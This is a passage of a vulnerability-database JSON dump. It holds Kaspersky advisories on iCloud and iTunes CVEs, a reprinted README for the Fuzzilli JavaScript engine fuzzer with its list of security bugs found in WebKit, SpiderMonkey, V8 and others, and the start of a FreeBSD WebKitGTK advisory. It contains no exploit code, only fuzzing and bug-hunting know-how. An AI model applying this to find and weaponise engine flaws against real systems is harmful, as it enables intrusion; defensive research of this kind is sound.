\n[CVE-2019-8582](<https://vulners.com/cve/CVE-2019-8582>)4.3Warning", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-05-28T00:00:00", "type": "kaspersky", "title": "KLA11490 Multiple vulnerabilities in iCloud", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-6237", "CVE-2019-8571", "CVE-2019-8577", "CVE-2019-8582", "CVE-2019-8583", "CVE-2019-8584", "CVE-2019-8586", "CVE-2019-8587", "CVE-2019-8594", "CVE-2019-8595", "CVE-2019-8596", "CVE-2019-8597", "CVE-2019-8598", "CVE-2019-8600", "CVE-2019-8601", "CVE-2019-8602", "CVE-2019-8607", "CVE-2019-8608", "CVE-2019-8609", "CVE-2019-8610", "CVE-2019-8611", "CVE-2019-8615", "CVE-2019-8619", "CVE-2019-8622", "CVE-2019-8623", "CVE-2019-8628"], "modified": "2020-06-03T00:00:00", "id": "KLA11490", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11490/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T19:30:15", "description": "### *Detect date*:\n05/28/2019\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in iTunes. Malicious users can exploit these vulnerabilities to obtain sensitive information, execute arbitrary code, gain privileges.\n\n### *Affected products*:\nITunes version 12.9.5\n\n### *Solution*:\nUpdate to the latest version \n[Download iTunes](<https://www.apple.com/itunes/download/>)\n\n### *Original advisories*:\n[HT210124](<https://support.apple.com/en-us/HT210124>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Apple iTunes](<https://threats.kaspersky.com/en/product/Apple-iTunes/>)\n\n### *CVE-IDS*:\n[CVE-2019-8601](<https://vulners.com/cve/CVE-2019-8601>)6.8High \n[CVE-2019-8628](<https://vulners.com/cve/CVE-2019-8628>)6.8High \n[CVE-2019-8597](<https://vulners.com/cve/CVE-2019-8597>)4.3Warning \n[CVE-2019-8610](<https://vulners.com/cve/CVE-2019-8610>)6.8High \n[CVE-2019-8622](<https://vulners.com/cve/CVE-2019-8622>)6.8High \n[CVE-2019-8607](<https://vulners.com/cve/CVE-2019-8607>)4.3Warning \n[CVE-2019-8571](<https://vulners.com/cve/CVE-2019-8571>)6.8High \n[CVE-2019-8586](<https://vulners.com/cve/CVE-2019-8586>)6.8High \n[CVE-2019-8583](<https://vulners.com/cve/CVE-2019-8583>)6.8High \n[CVE-2019-8611](<https://vulners.com/cve/CVE-2019-8611>)6.8High \n[CVE-2019-8615](<https://vulners.com/cve/CVE-2019-8615>)4.3Warning \n[CVE-2019-8594](<https://vulners.com/cve/CVE-2019-8594>)6.8High \n[CVE-2019-8595](<https://vulners.com/cve/CVE-2019-8595>)6.8High \n[CVE-2019-8584](<https://vulners.com/cve/CVE-2019-8584>)6.8High \n[CVE-2019-6237](<https://vulners.com/cve/CVE-2019-6237>)6.8High \n[CVE-2019-8577](<https://vulners.com/cve/CVE-2019-8577>)6.8High \n[CVE-2019-8600](<https://vulners.com/cve/CVE-2019-8600>)7.5Critical \n[CVE-2019-8623](<https://vulners.com/cve/CVE-2019-8623>)6.8High \n[CVE-2019-8598](<https://vulners.com/cve/CVE-2019-8598>)4.3Warning \n[CVE-2019-8608](<https://vulners.com/cve/CVE-2019-8608>)6.8High \n[CVE-2019-8619](<https://vulners.com/cve/CVE-2019-8619>)6.8High \n[CVE-2019-8602](<https://vulners.com/cve/CVE-2019-8602>)6.8High \n[CVE-2019-8587](<https://vulners.com/cve/CVE-2019-8587>)6.8High \n[CVE-2019-8596](<https://vulners.com/cve/CVE-2019-8596>)6.8High \n[CVE-2019-8609](<https://vulners.com/cve/CVE-2019-8609>)6.8High \n[CVE-2019-8582](<https://vulners.com/cve/CVE-2019-8582>)4.3Warning", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-05-28T00:00:00", "type": "kaspersky", "title": "KLA11489 Multiple vulnerabilities in iTunes", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-6237", "CVE-2019-8571", "CVE-2019-8577", "CVE-2019-8582", "CVE-2019-8583", "CVE-2019-8584", "CVE-2019-8586", "CVE-2019-8587", "CVE-2019-8594", "CVE-2019-8595", "CVE-2019-8596", "CVE-2019-8597", "CVE-2019-8598", "CVE-2019-8600", "CVE-2019-8601", "CVE-2019-8602", "CVE-2019-8607", "CVE-2019-8608", "CVE-2019-8609", "CVE-2019-8610", "CVE-2019-8611", "CVE-2019-8615", "CVE-2019-8619", "CVE-2019-8622", "CVE-2019-8623", "CVE-2019-8628"], "modified": "2020-06-03T00:00:00", "id": "KLA11489", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11489/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "kitploit": [{"lastseen": "2023-12-03T16:48:34", "description": "[](<https://1.bp.blogspot.com/-baywoaHmuas/X7dY6GbwC1I/AAAAAAAAUbo/jDpqwD_-UOkhzq98AhL8_vvWCKH3TlBvwCNcBGAsYHQ/s781/Fuzzilli.png>)\n\n \n\n\nA (coverage-)guided fuzzer for dynamic language interpreters based on a custom intermediate language (\"FuzzIL\") which can be mutated and translated to JavaScript.\n\n \n\n\n**Usage** \n\n\nThe basic steps to use this fuzzer are:\n\n 1. Download the source code for one of the supported JavaScript engines. See the [Targets/](<https://github.com/googleprojectzero/fuzzilli/blob/master/Targets> \"Targets/\" ) directory for the list of supported JavaScript engines.\n 2. Apply the corresponding patches from the target's directory. Also see the README.md in that directory.\n 3. Compile the engine with coverage [instrumentation](<https://www.kitploit.com/search/label/Instrumentation> \"instrumentation\" ) (requires clang &gt;= 4.0) as described in the README.\n 4. Compile the fuzzer: `swift build [-c release]`.\n 5. Run the fuzzer: `swift run [-c release] FuzzilliCli --profile=<profile> [other cli options] /path/to/jsshell`. See also `swift run FuzzilliCli --help`.\n\nBuilding and running Fuzzilli and the supported JavaScript engines inside Docker and on Google Compute Engine is [also supported](<https://github.com/googleprojectzero/fuzzilli/blob/master/Cloud> \"also supported\" ).\n\n \n**Hacking** \n\n\nCheck out [main.swift](<https://github.com/googleprojectzero/fuzzilli/blob/master/Sources/FuzzilliCli/main.swift> \"main.swift\" ) to see a usage example of the Fuzzilli library and play with the various configuration options. Next, take a look at [Fuzzer.swift](<https://github.com/googleprojectzero/fuzzilli/blob/master/Sources/Fuzzilli/Fuzzer.swift> \"Fuzzer.swift\" ) for the highlevel fuzzing logic. From there dive into any part that seems interesting.\n\nPatches, additions, other contributions etc. to this project are very welcome! However, do quickly check [the notes for contributors](<https://github.com/googleprojectzero/fuzzilli/blob/master/CONTRIBUTING.md> \"the notes for contributors\" ). Fuzzilli roughly follows [Google's code style guide for swift](<https://google.github.io/swift/> \"Google's code style guide for swift\" ).\n\nIt would be much appreciated if you could send a short note (possibly including a CVE number) to some-email@example.com or open a pull request for any [vulnerability](<https://www.kitploit.com/search/label/Vulnerability> \"vulnerability\" ) found with the help of this project so it can be included in the [bug showcase](<https://github.com/googleprojectzero/fuzzilli#bug-showcase> \"bug showcase\" ) section. Other than that you can of course claim any bug bounty, CVE credits, etc. for the [vulnerabilities](<https://www.kitploit.com/search/label/vulnerabilities> \"vulnerabilities\" ) :)\n\n \n**Concept** \n\n\nWhen fuzzing for core interpreter bugs, e.g. in JIT compilers, semantic correctness of generated programs becomes a concern. This is in contrast to most other scenarios, e.g. fuzzing of runtime APIs, in which case semantic correctness can easily be worked around by wrapping the generated code in try-catch constructs. There are different possibilities to achieve an acceptable rate of semantically correct samples, one of them being a mutational approach in which all samples in the corpus are also semantically valid. In that case, each mutation only has a small chance of turning a valid sample into an invalid one.\n\nTo implement a mutation-based JavaScript fuzzer, mutations to JavaScript code have to be defined. Instead of mutating the AST, or other syntactic elements of a program, a custom intermediate language (IL) is defined on which mutations to the control and data flow of a program can more directly be performed. This IL is afterwards translated to JavaScript for execution. The intermediate language looks roughly as follows:\n \n \n v0 <\u2212 LoadInteger '0' \n v1 <\u2212 LoadInteger '10' \n v2 <\u2212 LoadInteger '1' \n v3 <\u2212 LoadInteger '0' \n BeginFor v0, '<', v1, '+', v2 \u2212> v4 \n v6 <\u2212 BinaryOperation v3, '+', v4 \n Reassign v3, v6 \n EndFor \n v7 <\u2212 LoadString 'Result: ' \n v8 <\u2212 BinaryOperation v7, '+', v3 \n v9 <\u2212 LoadGlobal 'console' \n v10 <\u2212 CallMethod v9, 'log', [v8] \n \n\nWhich can e.g. be trivially translated to the following JavaScript code:\n \n \n const v0 = 0; \n const v1 = 10; \n const v2 = 1; \n let v3 = 0; \n for (let v4 = v0; v4 < v1; v4 = v4 + v2) { \n const v6 = v3 + v4; \n v3 = v6; \n } \n const v7 = \"Result: \"; \n const v8 = v7 + v3; \n const v9 = console; \n const v10 = v9.log(v8); \n \n\nOr to the following JavaScript code by inlining intermediate expressions:\n \n \n let v3 = 0; \n for (let v4 = 0; v4 < 10; v4++) { \n v3 = v3 + v4; \n } \n console.log(\"Result: \" + v3); \n \n\nFuzzIL has a number of properties:\n\n * A FuzzIL program is simply a list of instructions.\n * A FuzzIL instruction is an operation together with input and output variables and potentially one or more parameters (enclosed in single quotes in the notation above).\n * Inputs to instructions are always variables, there are no immediate values.\n * Every output of an instruction is a new variable, and existing variables can only be reassigned through dedicated operations such as the `Reassign` instruction.\n * Every variable is defined before it is used.\n\nA number of mutations can then be performed on these programs:\n\n * [InputMutator](<https://github.com/googleprojectzero/fuzzilli/blob/master/Sources/Fuzzilli/Mutators/InputMutator.swift> \"InputMutator\" ): replaces input variables of instructions with different ones to mutate the dataflow of the program.\n * [CodeGenMutator](<https://github.com/googleprojectzero/fuzzilli/blob/master/Sources/Fuzzilli/Mutators/CodeGenMutator.swift> \"CodeGenMutator\" ): generates code and inserts it somewhere in the mutated program. Code is generated either by running a [code generator](<https://github.com/googleprojectzero/fuzzilli/blob/master/Sources/Fuzzilli/Core/CodeGenerators.swift> \"code generator\" ) or by copying some instructions from another program in the corpus (splicing).\n * [CombineMutator](<https://github.com/googleprojectzero/fuzzilli/blob/master/Sources/Fuzzilli/Mutators/CombineMutator.swift> \"CombineMutator\" ): inserts a program from the corpus into a random position in the mutated program.\n * [OperationMutator](<https://github.com/googleprojectzero/fuzzilli/blob/master/Sources/Fuzzilli/Mutators/OperationMutator.swift> \"OperationMutator\" ): mutates the parameters of operations, for example replacing an integer constant with a different one.\n * and more...\n \n**Implementation** \n\n\nThe fuzzer is implemented in [Swift](<https://swift.org/> \"Swift\" ), with some parts (e.g. coverage measurements, socket interactions, etc.) implemented in C.\n\n \n**Architecture** \n\n\nA fuzzer instance (implemented in [Fuzzer.swift](<https://github.com/googleprojectzero/fuzzilli/blob/master/Sources/Fuzzilli/Fuzzer.swift> \"Fuzzer.swift\" )) is made up of the following central components:\n\n * [MutationFuzzer](<https://github.com/googleprojectzero/fuzzilli/blob/master/Sources/Fuzzilli/Core/MutationFuzzer.swift> \"MutationFuzzer\" ): produces new programs from existing ones by applying [mutations](<https://github.com/googleprojectzero/fuzzilli/blob/master/Sources/Fuzzilli/Mutators> \"mutations\" ). Afterwards executes the produced samples and evaluates them.\n * [ScriptRunner](<https://github.com/googleprojectzero/fuzzilli/blob/master/Sources/Fuzzilli/Execution> \"ScriptRunner\" ): executes programs of the target language.\n * [Corpus](<https://github.com/googleprojectzero/fuzzilli/blob/master/Sources/Fuzzilli/Core/Corpus.swift> \"Corpus\" ): stores interesting samples and supplies them to the core fuzzer.\n * [Environment](<https://github.com/googleprojectzero/fuzzilli/blob/master/Sources/Fuzzilli/Core/JavaScriptEnvironment.swift> \"Environment\" ): has knowledge of the runtime environment, e.g. the available builtins, property names, and methods.\n * [Minimizer](<https://github.com/googleprojectzero/fuzzilli/blob/master/Sources/Fuzzilli/Minimization/Minimizer.swift> \"Minimizer\" ): minimizes crashing and interesting programs.\n * [Evaluator](<https://github.com/googleprojectzero/fuzzilli/blob/master/Sources/Fuzzilli/Evaluation> \"Evaluator\" ): evaluates whether a sample is interesting according to some metric, e.g. code coverage.\n * [Lifter](<https://github.com/googleprojectzero/fuzzilli/blob/master/Sources/Fuzzilli/Lifting> \"Lifter\" ): translates a FuzzIL program to the target language (JavaScript).\n\nFurthermore, a number of modules are optionally available:\n\n * [Statistics](<https://github.com/googleprojectzero/fuzzilli/blob/master/Sources/Fuzzilli/Modules/Statistics.swift> \"Statistics\" ): gathers various pieces of statistical information.\n * [NetworkWorker/NetworkMaster](<https://github.com/googleprojectzero/fuzzilli/blob/master/Sources/Fuzzilli/Modules/NetworkSync.swift> \"NetworkWorker/NetworkMaster\" ): synchronize multiple instances over the network.\n * [ThreadWorker/ThreadMaster](<https://github.com/googleprojectzero/fuzzilli/blob/master/Sources/Fuzzilli/Modules/ThreadSync.swift> \"ThreadWorker/ThreadMaster\" ): synchronize multiple instances within the same process.\n * [Storage](<https://github.com/googleprojectzero/fuzzilli/blob/master/Sources/Fuzzilli/Modules/Storage.swift> \"Storage\" ): stores crashing programs to disk.\n\nThe fuzzer is event-driven, with most of the interactions between different classes happening through events. Events are dispatched e.g. as a result of a crash or an interesting program being found, a new program being executed, a log message being generated and so on. See [Events.swift](<https://github.com/googleprojectzero/fuzzilli/blob/master/Sources/Fuzzilli/Core/Events.swift> \"Events.swift\" ) for the full list of events. The event mechanism effectively decouples the various components of the fuzzer and makes it easy to implement additional modules.\n\nA FuzzIL program can be built up using a [ProgramBuilder](<https://github.com/googleprojectzero/fuzzilli/blob/master/Sources/Fuzzilli/Core/ProgramBuilder.swift> \"ProgramBuilder\" ) instance. A ProgramBuilder provides methods to create and append new instructions, append instructions from another program, retrieve existing variables, query the execution context at the current position (e.g. whether it is inside a loop), and more.\n\n \n**Execution** \n\n\nFuzzilli uses a custom execution mode called [REPRL (read-eval-print-reset-loop)](<https://github.com/googleprojectzero/fuzzilli/blob/master/Sources/Fuzzilli/Execution/REPRL.swift> \"REPRL \\(read-eval-print-reset-loop\\)\" ). For that, the target engine is modified to accept a script input over pipes and/or shared memory, execute it, then reset its internal state and wait for the next script. This removes the overhead from process creation and to a large part from the engine ininitializaiton.\n\n \n**Scalability** \n\n\nThere is one [Fuzzer](<https://github.com/googleprojectzero/fuzzilli/blob/master/Sources/Fuzzilli/Fuzzer.swift> \"Fuzzer\" ) instance per target process. This enables synchronous execution of programs and thereby simplifies the implementation of various algorithms such as consecutive mutations and minimization. Moreover, it avoids the need to implement thread-safe access to internal state, e.g. the corpus. Each fuzzer instance has its own [DispatchQueue](<https://developer.apple.com/documentation/dispatch/dispatchqueue> \"DispatchQueue\" ), conceptually corresponding to a single thread. As a rule of thumb, every interaction with a Fuzzer instance must happen on that instance\u2019s dispatch queue. This guarantees thread-safety as the queue is serial. For more details see [the docs](<https://github.com/googleprojectzero/fuzzilli/blob/master/Docs/ProcessingModel.md>).\n\nTo scale, fuzzer instances can become workers, in which case they report newly found interesting samples and [crashes](<https://www.kitploit.com/search/label/Crashes> \"crashes\" ) to a master instance. In turn, the master instances also synchronize their corpus with the workers. Communication between masters and workers can happen in different ways, each implemented as a module:\n\n * [Inter-thread communication](<https://github.com/googleprojectzero/fuzzilli/blob/master/Sources/Fuzzilli/Modules/ThreadSync.swift> \"Inter-thread communication\" ): synchronize instances in the same process by enqueuing tasks to the other fuzzer\u2019s DispatchQueue.\n * Inter-process communication (TODO): synchronize instances over an IPC channel.\n * [Inter-machine communication](<https://github.com/googleprojectzero/fuzzilli/blob/master/Sources/Fuzzilli/Modules/NetworkSync.swift> \"Inter-machine communication\" ): synchronize instances over a simple TCP-based protocol.\n\nThis design allows the fuzzer to scale to many cores on a single machine as well as to many different machines. As one master instance can quickly become overloaded if too many workers send programs to it, it is also possible to configure multiple tiers of master instances, e.g. one master instance, 16 intermediate masters connected to the master, and 256 workers connected to the intermediate masters.\n\n \n**Resources** \n\n\nFurther resources about this fuzzer:\n\n * A [presentation](<https://saelo.github.io/presentations/offensivecon_19_fuzzilli.pdf> \"presentation\" ) about Fuzzilli given at Offensive Con 2019.\n * The [master's thesis](<https://saelo.github.io/papers/thesis.pdf> \"master's thesis\" ) for which the initial implementation was done.\n * A [blogpost](<https://sensepost.com/blog/2020/the-hunt-for-chromium-issue-1072171/> \"blogpost\" ) by Sensepost about using Fuzzilli to find a bug in v8\n * A [blogpost](<https://blog.doyensec.com/2020/09/09/fuzzilli-jerryscript.html> \"blogpost\" ) by Doyensec about fuzzing the JerryScript engine with Fuzzilli\n \n**Bug Showcase** \n\n\nThe following is a list of some of the bugs found with the help of Fuzzilli. Only bugs with security impact are included in the list. Special thanks to all users of Fuzzilli who have reported bugs found by it!\n\n \n**WebKit/JavaScriptCore** \n\n\n * [Issue 185328](<https://bugs.webkit.org/show_bug.cgi?id=185328> \"Issue 185328\" ): DFG [Compiler](<https://www.kitploit.com/search/label/Compiler> \"Compiler\" ) uses incorrect output register for NumberIsInteger operation\n * [CVE-2018-4299](<https://www.zerodayinitiative.com/advisories/ZDI-18-1081/> \"CVE-2018-4299\" ): performProxyCall leaks internal object to script\n * [CVE-2018-4359](<https://bugs.webkit.org/show_bug.cgi?id=187451> \"CVE-2018-4359\" ): compileMathIC produces incorrect machine code\n * [CVE-2019-8518](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1775> \"CVE-2019-8518\" ): OOB access in FTL JIT due to LICM moving array access before the bounds check\n * [CVE-2019-8558](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1783> \"CVE-2019-8558\" ): CodeBlock UaF due to dangling Watchpoints\n * [CVE-2019-8611](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1788> \"CVE-2019-8611\" ): AIR optimization incorrectly removes assignment to register\n * [CVE-2019-8623](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1789> \"CVE-2019-8623\" ): Loop-invariant code motion (LICM) in DFG JIT leaves stack variable uninitialized\n * [CVE-2019-8622](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1802> \"CVE-2019-8622\" ): DFG's doesGC() is incorrect about the HasIndexedProperty operation's behaviour on StringObjects\n * [CVE-2019-8671](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1822> \"CVE-2019-8671\" ): DFG: Loop-invariant code motion (LICM) leaves object property access unguarded\n * [CVE-2019-8672](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1825> \"CVE-2019-8672\" ): JSValue use-after-free in ValueProfiles\n * [CVE-2019-8678](<https://bugs.webkit.org/show_bug.cgi?id=198259> \"CVE-2019-8678\" ): JSC fails to run haveABadTime() when some prototypes are modified, leading to type confusions\n * [CVE-2019-8685](<https://bugs.webkit.org/show_bug.cgi?id=197691> \"CVE-2019-8685\" ): JSPropertyNameEnumerator uses wrong structure IDs\n * [CVE-2019-8765](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1915> \"CVE-2019-8765\" ): GetterSetter type confusion during DFG compilation\n * [CVE-2019-8820](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1924> \"CVE-2019-8820\" ): Type confusion during bailout when reconstructing arguments objects\n * [CVE-2020-3901](<https://bugs.webkit.org/show_bug.cgi?id=206805> \"CVE-2020-3901\" ): GetterSetter type confusion in FTL JIT code (due to not always safe LICM)\n \n**Gecko/Spidermonkey** \n\n\n * [CVE-2018-12386](<https://ssd-disclosure.com/archives/3765/ssd-advisory-firefox-javascript-type-confusion-rce> \"CVE-2018-12386\" ): IonMonkey register allocation bug leads to type confusions\n * [CVE-2019-9791](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1791> \"CVE-2019-9791\" ): IonMonkey's type inference is incorrect for constructors entered via OSR\n * [CVE-2019-9792](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1794> \"CVE-2019-9792\" ): IonMonkey leaks JS_OPTIMIZED_OUT magic value to script\n * [CVE-2019-9816](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1808> \"CVE-2019-9816\" ): unexpected ObjectGroup in ObjectGroupDispatch operation\n * [CVE-2019-9813](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1810> \"CVE-2019-9813\" ): IonMonkey compiled code fails to update inferred property types, leading to type confusions\n * [CVE-2019-11707](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1820> \"CVE-2019-11707\" ): IonMonkey incorrectly predicts return type of Array.prototype.pop, leading to type confusions\n * [CVE-2020-15656](<https://bugzilla.mozilla.org/show_bug.cgi?id=1647293> \"CVE-2020-15656\" ): Type confusion for special arguments in IonMonkey\n \n**Chromium/v8** \n\n\n * [Issue 939316](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1799> \"Issue 939316\" ): Turbofan may read a Map pointer out-of-bounds when optimizing Reflect.construct\n * [Issue 944062](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1809> \"Issue 944062\" ): JSCallReducer::ReduceArrayIndexOfIncludes fails to insert Map checks\n * [CVE-2019-5831](<https://bugs.chromium.org/p/chromium/issues/detail?id=950328> \"CVE-2019-5831\" ): Incorrect map processing in V8\n * [Issue 944865](<https://bugs.chromium.org/p/chromium/issues/detail?id=944865> \"Issue 944865\" ): Invalid value representation in V8\n * [CVE-2019-5841](<https://bugs.chromium.org/p/chromium/issues/detail?id=969588> \"CVE-2019-5841\" ): Bug in inlining heuristic\n * [CVE-2019-5847](<https://bugs.chromium.org/p/chromium/issues/detail?id=972921> \"CVE-2019-5847\" ): V8 sealed/frozen elements cause crash\n * [CVE-2019-5853](<https://bugs.chromium.org/p/chromium/issues/detail?id=976627> \"CVE-2019-5853\" ): Memory corruption in regexp length check\n * [Issue 992914](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1923> \"Issue 992914\" ): Map migration doesn't respect element kinds, leading to type confusion\n * [CVE-2020-6512](<https://bugs.chromium.org/p/chromium/issues/detail?id=1084820> \"CVE-2020-6512\" ): Type Confusion in V8\n \n**[Duktape](<https://github.com/svaarala/duktape> \"Duktape\" )** \n\n\n * [Issue 2323](<https://github.com/svaarala/duktape/pull/2323> \"Issue 2323\" ): Unstable valstack pointer in putprop\n * [Issue 2320](<https://github.com/svaarala/duktape/pull/2320> \"Issue 2320\" ): Memcmp pointer overflow in string builtin\n \n**[JerryScript](<https://github.com/jerryscript-project/jerryscript> \"JerryScript\" )** \n\n\n * [CVE-2020-13991](<https://github.com/jerryscript-project/jerryscript/issues/3858> \"CVE-2020-13991\" ): Incorrect release of spread arguments\n * [Issue 3784](<https://github.com/jerryscript-project/jerryscript/issues/3784> \"Issue 3784\" ): Memory corruption due to incorrect property enumeration\n * [CVE-2020-13623](<https://github.com/jerryscript-project/jerryscript/issues/3785> \"CVE-2020-13623\" ): Stack overflow via property keys for Proxy objects\n * [CVE-2020-13649 (1)](<https://github.com/jerryscript-project/jerryscript/issues/3786> \"CVE-2020-13649 \\(1\\)\" ): Memory corruption due to error handling in case of OOM\n * [CVE-2020-13649 (2)](<https://github.com/jerryscript-project/jerryscript/issues/3788> \"CVE-2020-13649 \\(2\\)\" ): Memory corruption due to error handling in case of OOM\n * [CVE-2020-13622](<https://github.com/jerryscript-project/jerryscript/issues/3787> \"CVE-2020-13622\" ): Memory corruption due to incorrect handling of property keys for Proxy objects\n * [CVE-2020-14163](<https://github.com/jerryscript-project/jerryscript/issues/3804> \"CVE-2020-14163\" ): Memory corruption due to race condition triggered by garbage collection when adding key/value pairs\n * [Issue 3813](<https://github.com/jerryscript-project/jerryscript/issues/3813> \"Issue 3813\" ): Incorrect error handling in SerializeJSONProperty function\n * [Issue 3814](<https://github.com/jerryscript-project/jerryscript/issues/3814> \"Issue 3814\" ): Unexpected Proxy object in ecma_op_function_has_instance assertion\n * [Issue 3836](<https://github.com/jerryscript-project/jerryscript/issues/3836> \"Issue 3836\" ): Memory corruption due to incorrect TypedArray initialization\n * [Issue 3837](<https://github.com/jerryscript-project/jerryscript/issues/3837> \"Issue 3837\" ): Memory corruption due to incorrect memory handling in getOwnPropertyDescriptor\n \n**Disclaimer** \n\n\nThis is not an officially supported Google product.\n\n \n \n\n\n**[Download Fuzzilli](<https://github.com/googleprojectzero/fuzzilli> \"Download Fuzzilli\" )**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-21T20:30:00", "type": "kitploit", "title": "Fuzzilli - A JavaScript Engine Fuzzer", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-12386", "CVE-2018-4299", "CVE-2018-4359", "CVE-2019-11707", "CVE-2019-5831", "CVE-2019-5841", "CVE-2019-5847", "CVE-2019-5853", "CVE-2019-8518", "CVE-2019-8558", "CVE-2019-8611", "CVE-2019-8622", "CVE-2019-8623", "CVE-2019-8671", "CVE-2019-8672", "CVE-2019-8678", "CVE-2019-8685", "CVE-2019-8765", "CVE-2019-8820", "CVE-2019-9791", "CVE-2019-9792", "CVE-2019-9813", "CVE-2019-9816", "CVE-2020-13622", "CVE-2020-13623", "CVE-2020-13649", "CVE-2020-13991", "CVE-2020-14163", "CVE-2020-15656", "CVE-2020-3901", "CVE-2020-6512"], "modified": "2020-11-21T20:30:00", "id": "KITPLOIT:8766743662298222785", "href": "http://www.kitploit.com/2020/11/fuzzilli-javascript-engine-fuzzer.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "freebsd": [{"lastseen": "2023-12-03T16:50:39", "description": "\n\nThe WebKitGTK project reports many vulnerabilities,\n\tincluding several arbitrary code execution vulnerabilities.\n\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-04-10T00:00:00", "type": "freebsd", "title": "webkit2-gtk3 -- Multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11070", "CVE-2019-6201", "CVE-2019-6237", "CVE-2019-6251", "CVE-2019-7285", "CVE-2019-7292", "CVE-2019-8503", "CVE-2019-8506", "CVE-2019-8515", "CVE-2019-8518", "CVE-2019-8523", "CVE-2019-8524", "CVE-2019-8535", "CVE-2019-8536", "CVE-2019-8544", "CVE-2019-8551", "CVE-2019-8558", "CVE-2019-8559", 